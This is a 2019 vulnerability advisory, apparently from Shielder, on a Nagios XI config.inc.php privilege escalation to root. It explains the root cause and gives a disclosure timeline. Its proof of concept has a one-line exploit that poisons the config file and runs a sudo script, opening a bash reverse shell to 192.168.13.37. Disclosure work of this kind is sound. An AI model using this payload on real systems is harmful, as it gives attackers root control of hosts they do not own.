Nagios XI 5.5.10 config.inc Privilege Escalation

Summary

A privilege escalation in Nagios XI before 5.5.11 allows local attackers to elevate privileges to root via write access to config.inc.php.

Product description (from vendor)

“[Nagios XI] Provides monitoring of all mission-critical infrastructure components including applications, services, operating systems, network protocols, systems metrics, and network infrastructure. Hundreds of third-party addons provide for monitoring of virtually all in-house applications, services, and systems”. For more information visit https://www.nagios.com/products/nagios-xi/.

CVE(s)

Details

Root cause analysis

The Nagios XI user can run via sudo the file /usr/local/nagiosxi/scripts/repair_databases.sh. Such file evaluates the output of php $BASEDIR/import_xiconfig.php to import the current Nagios XI configuration:

1
2
3
4
5
    [...]
    BASEDIR=$(dirname $(readlink -f $0))
    [...]
--> eval $(php $BASEDIR/import_xiconfig.php)
    [...]

Which in turn imports another PHP file:

1
2
3
4
<?php
    [...]
    require_once("/usr/local/nagiosxi/html/config/config.inc.php");
    [...]

/usr/local/nagiosxi/html/config/config.inc.php is writable by the Nagios XI user:

1
2
$ ls -lah '/usr/local/nagiosxi/html/config/config.inc.php'
-rw-rw-r--. 1 nagios nagios 8.4K Feb 18 18:38 /usr/local/nagiosxi/html/config/config.inc.php 

It is possible to poison /usr/local/nagiosxi/html/config/config.inc.php and gain root privileges.

Proof of concept

  1. Start a TCP listener, edit the reverse shell payload if necessary and run the exploit:
1
echo 'print("bash -i >& /dev/tcp/192.168.13.37/31337 0>&1;");' >> '/usr/local/nagiosxi/html/config/config.inc.php' && sudo /usr/local/nagiosxi/scripts/repair_databases.sh

Impact

An attacker with command execution privileges as Nagios XI can elevate its privileges and take full control of the Nagios XI host.

Remediation

Upgrade to Nagios XI 5.5.11 or later. (Note: we didn’t verify the patch.)

Disclosure timeline

This report was subject to Shielder’s disclosure policy:

  • 20/02/2019:
    • Vulnerability report is sent to vendor
    • Vendor acknowledges issue and begins triage process
  • 28/02/2019: Vendor releases Nagios XI 5.5.11
  • 10/04/2019: Shielder’s advisory is made public

Credits

`polict` of Shielder

Data

10 April 2019